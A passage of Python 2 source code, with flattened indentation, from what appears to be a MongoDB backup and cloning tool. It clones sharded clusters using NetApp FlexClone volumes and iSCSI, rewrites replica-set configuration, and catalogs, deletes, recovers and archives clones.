logging.info('Volume {} ready to be cloned as {} on host {}'.format(vol['volume'],
clone_spec['volume'],
spec_sh_member['hostname']
))
lun_spec = dict()
lun_spec['path'] = '/vol/' + clone_spec['volume'] + '/' + vol['lun-name']
lun_spec['igroup-name'] = igroup_spec['igroup-name']
lun_map = Lun(lun_spec)
member['lun_mapping'].append(lun_map)
logging.info('Preparing LUN {} to be mapped to igroup {}.'.format(lun_spec['path'],
lun_spec['igroup-name']
))
shard_replset['members'].append(member)
break
cloned_cluster['shards'].append(shard_replset)
# -- Stage 2 :: Executing it
# -- running steps to clone config servers
for cs in cloned_cluster['config_servers']['members']:
# -- Preparing recover and normal mode start string
if self.clone_spec['defaults']['dir_per_db']:
recover_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + cs['mountpoint'] + ' --bind_ip ' + cs['hostname'] + ' --port ' + \
cs['port'] + ' --fork --directoryperdb'
normal_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + cs['mountpoint'] + ' --bind_ip ' + cs['hostname'] + ' --port ' + \
cs['port'] + ' --replSet ' + cloned_cluster['config_servers']['setname'] + \
' --fork --directoryperdb --configsvr'
else:
recover_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + cs['mountpoint'] + ' --bind_ip ' + cs['hostname'] + ' --port ' + \
cs['port'] + ' --fork'
normal_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + cs['mountpoint'] + ' --bind_ip ' + cs['hostname'] + ' --port ' + \
cs['port'] + ' --replSet ' + cloned_cluster['config_servers']['setname'] + \
' --fork --configsvr'
# -- openning a ssh connection to run host side commands
host = HostConn(ipaddr=cs['hostname'], username=self.username)
# -- if member is only an arbiter, there isn't any netapp action to be taken.
if cs['arbiter_only']:
# -- removing mongod.lock and mongod.pid
host.remove_file(cs['mountpoint'] + '/mongod.lock')
host.remove_file('/var/run/mongodb/mongod.pid')
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + recover_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in recover mode on host {}.'.format(cs['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in recover mode on host {}.'.format(cs['hostname']))
# -- Updating ReplicaSet info
mdb_uri = 'mongodb://' + cs['hostname'] + ':' + cs['port']
mdb_session = MongoDBCluster(mongodb_uri=mdb_uri)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': cloned_cluster['config_servers']['setname']},
update_doc={'$unset': {'members': ''}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': cloned_cluster['config_servers']['setname']},
update_doc={'$set': {'members': []}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': cloned_cluster['config_servers']['setname']},
update_doc={'$set': cloned_cluster['config_servers']['reconfig']}
)
# -- Stopping MongoDB recover mode
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Cannot kill mongoDB on host {}'.format(cs['hostname']))
exit(1)
else:
logging.info('MongoDB has been stopped on host {}.'.format(cs['hostname']))
host.remove_file(cs['mountpoint'] + '/mongod.lock')
host.remove_file('/var/run/mongodb/mongod.pid')
sleep(5)
# -- Starting MongoDB normal mode
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + normal_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in normal mode on host {}.'.format(cs['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in normal mode on host {}.'.format(cs['hostname']))
host.close()
continue
kdb_ntapsys = kdb_session['ntapsystems']
ntapsys = kdb_ntapsys.find_one({'svm-name': cs['svm-name']})
if ntapsys is None:
logging.error('Cannot find SVM {} in the netapp repository collection.'.format(cs['svm-name']))
exit(1)
svm_session = ClusterSession(cluster_ip=ntapsys['netapp-ip'], user=ntapsys['username'],
password=ntapsys['password'], vserver=ntapsys['svm-name'])
result = cs['igroup'].create(svm=svm_session)
if result[0] == 'failed':
logging.error('Failed to create initiator group {} for host {}.'.format(cs['igroup'].initiator_group_name,
cs['hostname']))
exit(1)
else:
logging.info('Initiator group {} has been created for host {}.'.format(cs['igroup'].initiator_group_name,
cs['hostname']))
result = cs['igroup'].add_initiators(svm=svm_session, initiator_list=cs['initiator'])
if result[0] == 'failed':
logging.error('Failed to add initiator {} to igroup {} for host {}.'.format(cs['initiator'],
cs['igroup'].initiator_group_name,
cs['hostname']))
exit(1)
else:
logging.info('Initiator {} has been added to {} for host {}.'.format(cs['initiator'],
cs['igroup'].initiator_group_name,
cs['hostname']))
for volclone in cs['volclone_topology']:
result = volclone.create(svm=svm_session)
if result[0] == 'failed':
logging.error('Failed to create flexclone {} for host {}.'.format(volclone.volume,
cs['hostname']))
exit(1)
else:
logging.info('FlexClone {} has been created.'.format(volclone.volume))
for lun in cs['lun_mapping']:
result = lun.mapping(svm=svm_session)
if result[0] == 'failed':
logging.error('Failed to map LUN {} to igroup {} for host {}.'.format(lun.path,
lun.igroup_name,
cs['hostname']))
exit(1)
else:
logging.info('LUN {} has been mapped to igroup {} for host {}.'.format(lun.path,
lun.igroup_name,
cs['hostname']))
result = host.iscsi_send_targets(iscsi_target=cs['iscsi_target'])
if result[1] != 0:
logging.error('{} on host {}'.format(result[0], cs['hostname']))
exit(1)
else:
logging.info('Discovering targets on {} for host {}.'.format(cs['iscsi_target'], cs['hostname']))
result = host.iscsi_node_login()
if result[1] != 0:
logging.error('{} on host {}.'.format(result[0], cs['hostname']))
exit(1)
else:
logging.info('Logged in to {} targets and ready to rescan devices on host {}.'.format(cs['igroup'].initiator_group_type,
cs['hostname']))
result = host.iscsi_rescan()
if result[1] != 0:
logging.error('Could not rescan {} devices on host {}.'.format(cs['igroup'].initiator_group_type,
cs['hostname']))
exit(1)
else:
logging.info('{} devices have been scanned on host {}.'.format(cs['igroup'].initiator_group_type,
cs['hostname']))
result = host.enable_vg(vg_name=cs['storage_info']['lvm_vgname'])
if result[1] != 0:
logging.error('Could not enable volume group {} on host {}.'.format(cs['storage_info']['lvm_vgname'],
cs['hostname']))
exit(1)
else:
logging.info('Volume Group {} has been activated on host {}.'.format(cs['storage_info']['lvm_vgname'],
cs['hostname']))
result = host.mount_fs(fs_mountpoint=cs['mountpoint'], fs_type=cs['storage_info']['fs_type'],
device=cs['storage_info']['mdb_device'])
if result[1] != 0:
logging.error('Could not mount device {} on host {}.'.format(cs['storage_info']['mdb_device'],
cs['hostname']))
exit(1)
else:
logging.info('Device {} has been mounted to {} on host {}.'.format(cs['storage_info']['mdb_device'],
cs['mountpoint'],
cs['hostname']))
# -- Starting MongoDB on recover mode
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + recover_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in recover mode on host {}.'.format(cs['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in recover mode on host {}.'.format(cs['hostname']))
# -- Updating ReplicaSet info
mdb_uri = 'mongodb://' + cs['hostname'] + ':' + cs['port']
mdb_session = MongoDBCluster(mongodb_uri=mdb_uri)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': cloned_cluster['config_servers']['setname']},
update_doc={'$unset': {'members': ''}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': cloned_cluster['config_servers']['setname']},
update_doc={'$set': {'members': []}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': cloned_cluster['config_servers']['setname']},
update_doc={'$set': cloned_cluster['config_servers']['reconfig']}
)
mdb_session.delete_doc(dbname='admin', collection='system.version',
delete_filter={'_id': 'minOpTimeRecovery'})
for spec_shard in self.clone_spec['shards']:
shard_string = spec_shard['shard_name'] + '/'
count = 1
for spec_sh_member in spec_shard['shard_members']:
if count < len(spec_shard['shard_members']):
shard_string += spec_sh_member['hostname'] + ':' + spec_sh_member['port'] + ','
elif count == len(spec_shard['shard_members']):
shard_string += spec_sh_member['hostname'] + ':' + spec_sh_member['port']
count += 1
mdb_session.update_doc(dbname='config', collection='shards',
update_filter={'_id': spec_shard['shard_name']},
update_doc={'$set': {'host': shard_string}})
# -- Stopping MongoDB recover mode
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Cannot kill mongoDB on host {}'.format(cs['hostname']))
exit(1)
else:
logging.info('MongoDB has been stopped on host {}.'.format(cs['hostname']))
host.remove_file(cs['mountpoint'] + '/mongod.lock')
host.remove_file('/var/run/mongodb/mongod.pid')
sleep(5)
# -- Starting MongoDB normal mode
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + normal_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in normal mode on host {}.'.format(cs['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in normal mode on host {}.'.format(cs['hostname']))
host.close()
# -- running steps to clone shards
for shard in cloned_cluster['shards']:
for shard_member in shard['members']:
# -- Preparing recover and normal mode start string
if self.clone_spec['defaults']['dir_per_db']:
recover_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + shard_member['mountpoint'] + ' --bind_ip ' + shard_member['hostname'] + ' --port ' + \
shard_member['port'] + ' --fork --directoryperdb'
normal_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + shard_member['mountpoint'] + ' --bind_ip ' + shard_member['hostname'] + ' --port ' + \
shard_member['port'] + ' --replSet ' + shard['name'] + \
' --fork --directoryperdb --shardsvr'
else:
recover_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + shard_member['mountpoint'] + ' --bind_ip ' + shard_member['hostname'] + ' --port ' + \
shard_member['port'] + ' --fork'
normal_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + shard_member['mountpoint'] + ' --bind_ip ' + shard_member['hostname'] + ' --port ' + \
shard_member['port'] + ' --replSet ' + shard['name'] + ' --fork --shardsvr'
# -- openning a ssh connection to run host side commands
host = HostConn(ipaddr=shard_member['hostname'], username=self.username)
# -- if member is only an arbiter, there isn't any netapp action to be taken.
if shard_member['arbiter_only']:
# -- removing mongod.lock and mongod.pid
host.remove_file(shard_member['mountpoint'] + '/mongod.lock')
host.remove_file('/var/run/mongodb/mongod.pid')
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + recover_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in recover mode on host {}.'.format(shard_member['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in recover mode on host {}.'.format(shard_member['hostname']))
# -- Updating ReplicaSet info
mdb_uri = 'mongodb://' + shard_member['hostname'] + ':' + shard_member['port']
mdb_session = MongoDBCluster(mongodb_uri=mdb_uri)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': shard['name']},
update_doc={'$unset': {'members': ''}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': shard['name']},
update_doc={'$set': { 'members': []}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': shard['name']},
update_doc={'$set': shard['reconfig']}
)
# -- Stopping MongoDB recover mode
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Cannot kill mongoDB on host {}'.format(shard_member['hostname']))
exit(1)
else:
logging.info('MongoDB has been stopped on host {}.'.format(shard_member['hostname']))
host.remove_file(shard_member['mountpoint'] + '/mongod.lock')
host.remove_file('/var/run/mongodb/mongod.pid')
sleep(5)
# -- Starting MongoDB normal mode
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + normal_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in normal mode on host {}.'.format(shard_member['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in normal mode on host {}.'.format(shard_member['hostname']))
host.close()
continue
kdb_ntapsys = kdb_session['ntapsystems']
ntapsys = kdb_ntapsys.find_one({'svm-name': shard_member['svm-name']})
if ntapsys is None:
logging.error('Cannot find SVM {} in the netapp repository collection.'.format(shard_member['svm-name']))
exit(1)
svm_session = ClusterSession(cluster_ip=ntapsys['netapp-ip'], user=ntapsys['username'],
password=ntapsys['password'], vserver=ntapsys['svm-name'])
result = shard_member['igroup'].create(svm=svm_session)
if result[0] == 'failed':
logging.error(
'Failed to create initiator group {} for host {}.'.format(shard_member['igroup'].initiator_group_name,
shard_member['hostname']))
exit(1)
else:
logging.info(
'Initiator group {} has been created for host {}.'.format(shard_member['igroup'].initiator_group_name,
shard_member['hostname']))
result = shard_member['igroup'].add_initiators(svm=svm_session, initiator_list=shard_member['initiator'])
if result[0] == 'failed':
logging.error('Failed to add initiator {} to igroup {} for host {}.'.format(shard_member['initiator'],
shard_member[
'igroup'].initiator_group_name,
shard_member['hostname']))
exit(1)
else:
logging.info('Initiator {} has been added to {} for host {}.'.format(shard_member['initiator'],
shard_member[
'igroup'].initiator_group_name,
shard_member['hostname']))
for volclone in shard_member['volclone_topology']:
result = volclone.create(svm=svm_session)
if result[0] == 'failed':
logging.error('Failed to create flexclone {} for host {}.'.format(volclone.volume,
shard_member['hostname']))
exit(1)
else:
logging.info('FlexClone {} has been created.'.format(volclone.volume))
for lun in shard_member['lun_mapping']:
result = lun.mapping(svm=svm_session)
if result[0] == 'failed':
logging.error('Failed to map LUN {} to igroup {} for host {}.'.format(lun.path,
lun.igroup_name,
shard_member['hostname']))
exit(1)
else:
logging.info('LUN {} has been mapped to igroup {} for host {}.'.format(lun.path,
lun.igroup_name,
shard_member['hostname']))
result = host.iscsi_send_targets(iscsi_target=shard_member['iscsi_target'])
if result[1] != 0:
logging.error('{} on host {}'.format(result[0], shard_member['hostname']))
exit(1)
else:
logging.info(
'Discovering targets on {} for host {}.'.format(shard_member['iscsi_target'], shard_member['hostname']))
result = host.iscsi_node_login()
if result[1] != 0:
logging.error('{} on host {}.'.format(result[0], shard_member['hostname']))
exit(1)
else:
logging.info('Logged in to {} targets and ready to rescan devices on host {}.'.format(
shard_member['igroup'].initiator_group_type,
shard_member['hostname']))
result = host.iscsi_rescan()
if result[1] != 0:
logging.error(
'Could not rescan {} devices on host {}.'.format(shard_member['igroup'].initiator_group_type,
shard_member['hostname']))
exit(1)
else:
logging.info(
'{} devices have been scanned on host {}.'.format(shard_member['igroup'].initiator_group_type,
shard_member['hostname']))
result = host.enable_vg(vg_name=shard_member['storage_info']['lvm_vgname'])
if result[1] != 0:
logging.error(
'Could not enable volume group {} on host {}.'.format(shard_member['storage_info']['lvm_vgname'],
shard_member['hostname']))
exit(1)
else:
logging.info(
'Volume Group {} has been activated on host {}.'.format(shard_member['storage_info']['lvm_vgname'],
shard_member['hostname']))
result = host.mount_fs(fs_mountpoint=shard_member['mountpoint'], fs_type=shard_member['storage_info']['fs_type'],
device=shard_member['storage_info']['mdb_device'])
if result[1] != 0:
logging.error('Could not mount device {} on host {}.'.format(shard_member['storage_info']['mdb_device'],
shard_member['hostname']))
exit(1)
else:
logging.info(
'Device {} has been mounted to {} on host {}.'.format(shard_member['storage_info']['mdb_device'],
shard_member['mountpoint'],
shard_member['hostname']))
# -- Starting MongoDB on recover mode
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + recover_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in recover mode on host {}.'.format(shard_member['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in recover mode on host {}.'.format(shard_member['hostname']))
# -- Updating ReplicaSet info
mdb_uri = 'mongodb://' + shard_member['hostname'] + ':' + shard_member['port']
mdb_session = MongoDBCluster(mongodb_uri=mdb_uri)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': shard['name']},
update_doc={'$unset': {'members': ''}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': shard['name']},
update_doc={'$set': {'members': []}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': shard['name']},
update_doc={'$set': shard['reconfig']}
)
mdb_session.delete_doc(dbname='admin', collection='system.version',
delete_filter={'_id': 'minOpTimeRecovery'})
# -- creating configsrvConnectionString
conn_string = self.clone_spec['config_servers']['setname'] + '/'
for spec_cs_member in self.clone_spec['config_servers']['members']:
hostport = spec_cs_member['hostname'] + ':' + spec_cs_member['port']
conn_string += hostport + ','
mdb_session.update_doc(dbname='admin', collection='system.version',
update_filter={'_id': 'shardIdentity'},
update_doc={'$set': {'configsvrConnectionString': conn_string[:-1]}})
# -- Stopping MongoDB recover mode
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Cannot kill mongoDB on host {}'.format(shard_member['hostname']))
exit(1)
else:
logging.info('MongoDB has been stopped on host {}.'.format(shard_member['hostname']))
host.remove_file(shard_member['mountpoint'] + '/mongod.lock')
host.remove_file('/var/run/mongodb/mongod.pid')
sleep(5)
# -- Starting MongoDB normal mode
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + normal_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in normal mode on host {}.'.format(shard_member['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in normal mode on host {}.'.format(shard_member['hostname']))
host.close()
# -- Starting mongoses
count = 1
configdb = self.clone_spec['config_servers']['setname'] + '/'
for spec_cs_member in self.clone_spec['config_servers']['members']:
if count < len(self.clone_spec['config_servers']['members']):
configdb += spec_cs_member['hostname'] + ':' + spec_cs_member['port'] + ','
elif count == len(self.clone_spec['config_servers']['members']):
configdb += spec_cs_member['hostname'] + ':' + spec_cs_member['port']
count += 1
for mongos in self.clone_spec['mongos']:
host = HostConn(ipaddr=mongos, username=self.username)
result = host.run_command('/usr/bin/mongos --bind_ip ' + mongos + ' --configdb ' + configdb +
' --fork --logpath /var/log/mongodb/mongos.log')
if result[1] != 0:
logging.error('Could not start mongos on host {}.'.format(mongos))
exit(1)
else:
logging.info('mongos has been started on host {}.'.format(mongos))
host.close()
# -- Stage 3 :: Cataloging it
clone_metadata = dict()
clone_metadata['clone_name'] = self.clone_name
clone_metadata['backup_name'] = self.backup_name
clone_metadata['cluster_name'] = self.cluster_name
clone_metadata['clone_uid'] = int(self.clone_uid)
clone_metadata['created_at'] = datetime.now()
clone_metadata['desc'] = self.desc
clone_metadata['mongos'] = self.clone_spec['mongos']
clone_metadata['config_server'] = list()
clone_metadata['shards'] = list()
for cs_member in cloned_cluster['config_servers']['members']:
member = dict()
if cs_member['arbiter_only']:
member['hostname'] = cs_member['hostname']
member['arbiter_only'] = cs_member['arbiter_only']
continue
member['hostname'] = cs_member['hostname']
member['arbiter_only'] = cs_member['arbiter_only']
member['igroup_name'] = cs_member['igroup'].initiator_group_name
member['svm_name'] = cs_member['svm-name']
member['mountpoint'] = cs_member['mountpoint']
member['lvm_vgname'] = cs_member['storage_info']['lvm_vgname']
member['volclone_topology'] = list()
for vol in cs_member['volclone_topology']:
member['volclone_topology'].append(vol.volume)
clone_metadata['config_server'].append(member)
for shard in cloned_cluster['shards']:
sh = dict()
sh['name'] = shard['name']
sh['members'] = list()
for sh_member in shard['members']:
member = dict()
if sh_member['arbiter_only']:
member['hostname'] = sh_member['hostname']
member['arbiter_only'] = sh_member['arbiter_only']
continue
member['hostname'] = sh_member['hostname']
member['arbiter_only'] = sh_member['arbiter_only']
member['igroup_name'] = sh_member['igroup'].initiator_group_name
member['svm_name'] = sh_member['svm-name']
member['mountpoint'] = sh_member['mountpoint']
member['lvm_vgname'] = sh_member['storage_info']['lvm_vgname']
member['volclone_topology'] = list()
for vol in sh_member['volclone_topology']:
member['volclone_topology'].append(vol.volume)
sh['members'].append(member)
clone_metadata['shards'].append(sh)
kdb_clones = kdb_session['clones']
result = kdb_clones.insert_one(clone_metadata).inserted_id
if result is None:
logging.error('Clone has been created but it was not inserted into the catalog.')
exit(1)
else:
logging.info('Clone has been created successfully.')
def delete(self, kdb_session=None):
kdb_clones = kdb_session['clones']
clone2del = kdb_clones.find_one({'clone_name': self.clone_name})
if clone2del is None:
logging.error('Cannot find clone {}.'.format(self.clone_name))
exit(1)
for mongos in clone2del['mongos']:
host = HostConn(ipaddr=mongos, username=self.username)
result = host.run_command('pkill mongos')
if result[1] != 0:
logging.error('Could not kill mongos on host {}.'.format(mongos))
# exit(1)
else:
logging.info('mongos has been stopped on host {}.'.format(mongos))
host.close()
for cs_member in clone2del['config_server']:
host = HostConn(ipaddr=cs_member['hostname'], username=self.username)
if cs_member['arbiter_only']:
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Could not kill mongod on host {}'.format(cs_member['hostname']))
# exit(1)
else:
logging.info('mongod has been stopped on host {}.'.format(cs_member['hostname']))
continue
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Could not kill mongod on host {}'.format(cs_member['hostname']))
# exit(1)
else:
logging.info('mongod has been stopped on host {}.'.format(cs_member['hostname']))
sleep(3)
result = host.umount_fs(fs_mountpoint=cs_member['mountpoint'])
if result[1] != 0:
logging.error('Could not unmount mongoDB file system {} on host {}.'.format(cs_member['mountpoint'],
cs_member['hostname']))
# exit(1)
else:
logging.info('mongoDB file system {} has been unmounted on host {}.'.format(cs_member['mountpoint'],
cs_member['hostname']))
sleep(3)
result = host.disable_vg(vg_name=cs_member['lvm_vgname'])
if result[1] != 0:
logging.error('Could not disable volume group {} on host {}.'.format(cs_member['lvm_vgname'],
cs_member['hostname']))
# exit(1)
else:
logging.info('Volume Group {} has been disabled on host {}.'.format(cs_member['lvm_vgname'],
cs_member['hostname']))
# -- establishing NetApp cluster session to delete flexclones
# -- Putting volumes offline, then delete them.
# -- Destroying igroups
kdb_ntapsys = kdb_session['ntapsystems']
ntapsys = kdb_ntapsys.find_one({'svm-name': cs_member['svm_name']})
svm_session = ClusterSession(cluster_ip=ntapsys['netapp-ip'], user=ntapsys['username'],
password=ntapsys['password'], vserver=ntapsys['svm-name'])
for vol in cs_member['volclone_topology']:
vol_spec = dict()
vol_spec['volume'] = vol
volclone = Volume(vol_spec)
result = volclone.destroy(svm=svm_session)
if result[0] == 'failed':
logging.error('Could not delete flexvolume {} on SVM {}.'.format(vol, cs_member['svm_name']))
# exit(1)
else:
logging.info('FlexClone volume {} has been deleted on SVM {}.'.format(vol, cs_member['svm_name']))
igroup_spec = dict()
igroup_spec['igroup-name'] = cs_member['igroup_name']
igroup = InitiatorGroup(igroup_spec)
result = igroup.destroy(svm=svm_session)
if result[0] == 'failed':
logging.error('Could not destroy igroup {} on SVM {}.'.format(cs_member['igroup_name'],
cs_member['svm_name']))
# exit(1)
else:
logging.info('Igroup {} has been destroyed on SVM {}.'.format(cs_member['igroup_name'],
cs_member['svm_name']))
result = host.iscsi_rescan()
if result[1] != 0:
logging.error('Could not rescan devices on host {}.'.format(cs_member['hostname']))
# exit(1)
else:
logging.info('Stale devices has been removed on host {}.'.format(cs_member['hostname']))
host.close()
for shard in clone2del['shards']:
for sh_member in shard['members']:
host = HostConn(ipaddr=sh_member['hostname'], username=self.username)
if sh_member['arbiter_only']:
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Could not kill mongod on host {}'.format(sh_member['hostname']))
# exit(1)
else:
logging.info('mongod has been stopped on host {}.'.format(sh_member['hostname']))
continue
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Could not kill mongod on host {}'.format(sh_member['hostname']))
# exit(1)
else:
logging.info('mongod has been stopped on host {}.'.format(sh_member['hostname']))
sleep(3)
result = host.umount_fs(fs_mountpoint=sh_member['mountpoint'])
if result[1] != 0:
logging.error('Could not unmount mongoDB file system {} on host {}.'.format(sh_member['mountpoint'],
sh_member['hostname']))
# exit(1)
else:
logging.info('mongoDB file system {} has been unmounted on host {}.'.format(sh_member['mountpoint'],
sh_member['hostname']))
sleep(3)
result = host.disable_vg(vg_name=sh_member['lvm_vgname'])
if result[1] != 0:
logging.error('Could not disable volume group {} on host {}.'.format(sh_member['lvm_vgname'],
sh_member['hostname']))
# exit(1)
else:
logging.info('Volume Group {} has been disabled on host {}.'.format(sh_member['lvm_vgname'],
sh_member['hostname']))
# -- establishing NetApp cluster session to delete flexclones
# -- Putting volumes offline, then delete them.
# -- Destroying igroups
kdb_ntapsys = kdb_session['ntapsystems']
ntapsys = kdb_ntapsys.find_one({'svm-name': sh_member['svm_name']})
svm_session = ClusterSession(cluster_ip=ntapsys['netapp-ip'], user=ntapsys['username'],
password=ntapsys['password'], vserver=ntapsys['svm-name'])
for vol in sh_member['volclone_topology']:
vol_spec = dict()
vol_spec['volume'] = vol
volclone = Volume(vol_spec)
result = volclone.destroy(svm=svm_session)
if result[0] == 'failed':
logging.error('Could not delete flexvolume {} on SVM {}.'.format(vol, sh_member['svm_name']))
# exit(1)
else:
logging.info(
'FlexClone volume {} has been deleted on SVM {}.'.format(vol, sh_member['svm_name']))
igroup_spec = dict()
igroup_spec['igroup-name'] = sh_member['igroup_name']
igroup = InitiatorGroup(igroup_spec)
result = igroup.destroy(svm=svm_session)
if result[0] == 'failed':
logging.error('Could not destroy igroup {} on SVM {}.'.format(sh_member['igroup_name'],
sh_member['svm_name']))
# exit(1)
else:
logging.info('Igroup {} has been destroyed on SVM {}.'.format(sh_member['igroup_name'],
sh_member['svm_name']))
result = host.iscsi_rescan()
if result[1] != 0:
logging.error('Could not rescan devices on host {}.'.format(sh_member['hostname']))
# exit(1)
else:
logging.info('Stale devices has been removed on host {}.'.format(sh_member['hostname']))
host.close()
result = kdb_clones.delete_one({'clone_name': self.clone_name})
if result is not None:
logging.info('Clone {} has been deleted.'.format(self.clone_name))
def list(self, kdb_session=None):
kdb_clones = kdb_session['clones']
result = kdb_clones.find({'cluster_name': self.cluster_name})
if result is None:
print 'There are no clones to be listed for {} cluster.'.format(self.cluster_name)
else:
for clone in result:
print 'Clone Name..: {}'.format(clone['clone_name'])
print 'Created at..: {}'.format(clone['created_at'].strftime('%Y-%m-%d %H:%M:%S.%f'))
print 'Based on....: {}'.format(clone['backup_name'])
print 'Description.: {}'.format(clone['desc'])
print ''
# print '{:30} \t {:30} \t {:30} \t {:40}'.format('Clone Name', 'Created at', 'Based on', 'Description')
# for clone in result:
# print '{:30} \t {:30} \t {:30} \t {:40}'.format(clone['clone_name'], clone['created_at'].strftime('%c %Z'),
# clone['backup_name'], clone['desc'])
class SubCmdRecover:
def __init__(self, rec_spec=None):
self.cluster_name = rec_spec['from-cluster-name']
self.dest_mongodb_uri = rec_spec['dest-mongodb-uri']
self.from_date = rec_spec['from-date']
self.until_date = rec_spec['until-date']
self.arch_repo_name = rec_spec['arch-repo-name']
self.arch_repo_uri = rec_spec['arch-repo-uri']
self.temp_coll = 'temp_' + self.cluster_name + '_' + str(int(time()))
if 'skip_op_cfg' in rec_spec:
self.skip_op = rec_spec['skip_op_cfg']
if (mp.cpu_count()/2)-1 == 0:
self.num_consumers = 1
else:
self.num_consumers = (mp.cpu_count()/2)-1
def start(self):
# Initiate a queue and lock to be used by consumers and producers
recover_queue = multiprocessing.queues.JoinableQueue()
# Recover Producer instance
atd = ArchTempData(arch_repo_uri=self.arch_repo_uri, arch_repo_name=self.arch_repo_name,
source_cluster_name=self.cluster_name, begin_from=self.from_date, upto=self.until_date,
temp_coll=self.temp_coll, arch_queue=recover_queue)
# Create a temporary collection containing the data that will be added back to the databases
atd.create_temp_data()
# Create a process to read temp data and insert in the queue
atd.read_temp_data()
# prepare the list of consumer instances
consumers = list()
num_procs = 0
while num_procs < self.num_consumers:
consumers.append(RecoverConsumer(arch_queue=recover_queue, dest_cluster_uri=self.dest_mongodb_uri))
num_procs += 1
# prepare list of consumer process instances
consumer_procs = list()
for consumer in consumers:
consumer_procs.append(mp.Process(target=consumer.run))
# kicking off consumer processes
for consumer_proc in consumer_procs:
consumer_proc.start()
# Waiting processes to finish their work
for consumer_proc in consumer_procs:
consumer_proc.join()
# Destroy temp data collection
atd.destroy_temp_data()
logging.info('Recover process has been completed.')
class SubCmdArchiver:
def __init__(self, archiver_spec=None):
self.arch_spec = archiver_spec
def create(self, catalog_sess=None):
catalog_sess.add(coll_name='archivers', doc=self.arch_spec)
def delete(self, catalog_sess=None):
catalog_sess.remove_one(coll_name='archivers', query={'cluster_name': self.arch_spec['cluster_name'],
'archiver_name': self.arch_spec['archiver_name']})
@staticmethod
def list(catalog_sess=None, cluster_name=None):
archivers = catalog_sess.find_all(coll_name='archivers', query={'cluster_name': cluster_name})
return archivers
def stop(self, catalog_sess=None):
pidfilename = catalog_sess.find_one(coll_name='archivers',
query={'cluster_name': self.arch_spec['cluster_name'],
'archiver_name': self.arch_spec['archiver_name']})['pidfile']
try:
pidfile = open(pidfilename, 'r')
ppid = pidfile.readline()
except IOError, e:
logging.error(e)
Process(int(ppid)).terminate()
catalog_sess.edit(coll_name='archivers', query={'cluster_name': self.arch_spec['cluster_name'],
'archiver_name': self.arch_spec['archiver_name']},
update={'$unset': {'pidfile': ''}})
def start(self, catalog_sess=None):
appKAPTR = AppKairosAPTR(cluster_name=self.arch_spec['cluster_name'],
database_name=self.arch_spec['database_name'],
collections=self.arch_spec['collections'], mongodb_uri=self.arch_spec['mongodb_uri'],
archiver_name=self.arch_spec['archiver_name'],
archive_repo_uri=self.arch_spec['archive_repo_uri'],
archive_repo_name=self.arch_spec['archive_repo_name'])
catalog_sess.edit(coll_name='archivers', query={'cluster_name': self.arch_spec['cluster_name'],
'archiver_name': self.arch_spec['archiver_name']},
update={'$set': { 'pidfile': appKAPTR.get_pidfilename()}})
appKAPTR.start()
def status(self, catalog_sess=None):
# Getting the PID filename from Kairos' repository
archiver = catalog_sess.find_one(coll_name='archivers',
query={'cluster_name': self.arch_spec['cluster_name'],
'archiver_name': self.arch_spec['archiver_name']})
# Opening the PID file and getting the archiver PID
if 'pidfile' not in archiver.keys():
return False
else:
try:
pidfile = open(archiver['pidfile'], 'r')
